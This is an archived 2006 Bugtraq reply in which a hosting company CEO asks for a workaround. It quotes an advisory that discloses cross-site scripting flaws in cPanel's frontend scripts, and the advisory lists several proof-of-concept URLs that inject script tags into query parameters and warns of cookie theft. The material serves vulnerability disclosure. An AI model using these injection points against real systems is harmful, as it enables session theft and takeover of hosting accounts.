[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BAY112-F295E0D69AA422396D27C69DE0C0@phx.gbl>
Date: Sat, 04 Feb 2006 09:23:02 +0000
From: "Hamish Stanaway" <koremeltdown@...mail.com>
To: simo@...x.org, bugtraq@...urityfocus.com
Subject: RE: cPanel Multiple Cross Site Scripting Vulnerability
Hi there,
Thank you for finding this vulnerability in a widely used software. I was
wondering if you had a solution or a work around to this issue?
Kindest of regards,
Hamish Stanaway, CEO
Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand
http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com
>From: simo@...x.org
>To: bugtraq@...urityfocus.com
>Subject: cPanel Multiple Cross Site Scripting Vulnerability
>Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
>MIME-Version: 1.0
>Received: from outgoing.securityfocus.com ([205.206.231.27]) by
>bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri, 3
>Feb 2006 08:56:14 -0800
>Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
> via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3 Feb
>2006 08:33:09 -0800
>Received: from lists2.securityfocus.com (lists2.securityfocus.com
>[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
>803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST)
>Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
>X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>User-Agent: SquirrelMail/1.4.4
>X-AntiAbuse: This header was added to track abuse, please include it with
>any abuse report
>X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
>X-AntiAbuse: Original Domain - securityfocus.com
>X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
>X-AntiAbuse: Sender Address Domain - morx.org
>X-Source: X-Source-Args: X-Source-Dir: Return-Path:
>bugtraq-return-23195-koremeltdown=hotmail.com@...urityfocus.com
>X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC)
>FILETIME=[BE6AAD60:01C628E2]
>
>Title: cPanel Multiple Cross Site Scripting
>
>Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
>Discovered: 22 january 2005
>Published: 02 february 2006
>MorX Security Research Team
>http://www.morx.org
>
>Service: Web Hosting Manager
>
>Vendor: cPanel
>
>Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
>
>Severity: Medium/High
>
>Details:
>
>cPanel (control panel) is a graphical web-based management tool, designed
>to make administration of web sites as easy as possible. cPanel handles
>all aspects of website administration in an easy-to-use interface.
>The software, which is proprietary, runs on a number of popular RPM-based
>Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
>Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
>accessed on ports 2082 and 2083 (for a SSL version). Authentication is
>either via HTTP or web page login. cPanel is prone to cross-site scripting
>attacks. This problem is due to a failure in the application to properly
>sanitize user-supplied input
>
>
>
>Impact:
>
>an attacker can exploit the vulnerable scripts to have arbitrary script
>code executed in the browser of an authentified cPanel user in the context
>of the website hosting the vulnerable cPanel version. resulting in the
>theft of cookie-based authentication giving the attacker full access to
>the victim's cPanel account as well as other type of attacks.
>
>
>Affected scripts with proof of concept exploit:
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
>
>Disclaimer:
>
>this entire document is for eductional, testing and demonstrating purpose
>only. Modification use and/or publishing this information is entirely on
>your OWN risk. The information provided in this advisory is to be
>used/tested on your OWN machine/Account. I cannot be held responsible for
>any of the above.
Powered by blists - more mailing lists